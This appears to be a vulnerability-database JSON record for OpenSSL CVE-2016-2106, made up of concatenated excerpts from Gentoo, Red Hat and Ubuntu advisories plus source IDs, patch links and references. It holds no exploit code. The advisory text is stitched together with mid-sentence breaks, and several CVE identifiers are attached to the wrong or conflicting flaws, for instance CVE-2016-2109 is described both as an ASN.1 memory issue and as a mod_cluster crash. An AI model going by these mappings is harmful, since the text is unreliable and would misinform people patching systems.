RSA cipher suites. A malicious server could make a TLS/SSL\nclient using OpenSSL use a weaker key exchange method. (CVE-2016-3110)\n\n* It was found that OpenSSL\u0027s BigNumber Squaring implementation could\nproduce incorrect results under certain special conditions. Note that this issue occurred rarely and with a low probability,\nand there is currently no known way of exploiting it. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. Additionally, a time based side-channel\nattack may allow a local attacker to recover a private DSA key. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. The JBoss server process must be restarted for the update\nto take effect. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:0722-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0722.html\nIssue date: 2016-05-09\nCVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)\n\n* Several flaws were found in the way BIO_*printf functions were\nimplemented in OpenSSL. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.5.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.5.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMFlTXlSAg2UNWIIRAhYAAJ0T9Ib2vXUa5te34i6fphHrbe0HlwCfePy5\nWjaK8x9OaI0FgbWyfxvwq6o=\n=jHjh\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. ============================================================================\nUbuntu Security Notice USN-2959-1\nMay 03, 2016\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 15.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. (CVE-2016-2106)\n\nBrian Carpenter discovered that OpenSSL incorrectly handled memory when\nASN.1 data is read from a BIO. \n(CVE-2016-2109)\n\nAs a security improvement, this update also modifies OpenSSL behaviour to\nreject DH key sizes below 1024 bits, preventing a possible downgrade\nattack. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.1\n\nUbuntu 15.10:\n libssl1.0.0 1.0.2d-0ubuntu1.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.19\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.36\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes", "sources": [ { "db": "NVD", "id": "CVE-2016-2106" }, { "db": "BID", "id": "89744" }, { "db": "VULMON", "id": "CVE-2016-2106" }, { "db": "PACKETSTORM", "id": "138471" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "136895" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2106", "trust": 2.7 }, { "db": "BID", "id": "89744", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "136912", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40202", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-18", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "SECTRACK", "id": "1035721", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10160", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "BID", "id": "91787", "trust": 1.7 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201605-082", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2106", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138471", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138473", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139115", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136937", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136895", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2106" }, { "db": "BID", "id": "89744" }, { "db": "PACKETSTORM", "id": "138471" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "136895" }, { "db": "CNNVD", "id": "CNNVD-201605-082" }, { "db": "NVD", "id": "CVE-2016-2106" } ] }, "id": "VAR-201605-0076", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.43052093714285716 }, "last_update_date": "2024-07-23T20:02:36.076000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "OpenSSL Fixes for integer overflow vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=61407" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/03/openssl_patches/" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162073 - security advisory" }, { "title": "Red Hat: CVE-2016-2106", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2106" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2959-1" }, { "title": "Debian Security Advisories: DSA-3566-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=055972eb84483959232c972f757685e0" }, { "title": "Amazon Linux AMI: ALAS-2016-695", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-695" }, { "title": "Tenable Security Advisories: [R5] OpenSSL \u002720160503\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-10" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Tenable Security Advisories: [R3] PVS 5.1.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-13" }, { "title": "Symantec Security Advisories: SA123 : OpenSSL Vulnerabilities 3-May-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=5d65f6765e60e5fe9e6998a5bde1aadc" }, { "title": "Forcepoint Security Advisories: CVE-2016-2105, 2106, 2107, 2108, 2109, 2176 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=01fd01e3d154696ffabfde89f4142310" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=0bd8c924b56aac98dda0f5b45f425f38" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Tenable Security Advisories: [R7] LCE 4.8.1 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-18" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2106 " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2106" }, { "db": "CNNVD", "id": "CNNVD-201605-082" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-189", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2106" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "trust": 2.0, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1650.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1648.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2959-1" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "trust": 1.7, "url": "https://support.apple.com/ht206903" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-1649.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05320149" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/89744" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00016.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00014.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/184605.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00018.html" }, { "trust": 1.7, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:17.openssl.asc" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00010.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183457.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00036.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00013.html" }, { "trust": 1.7, "url": 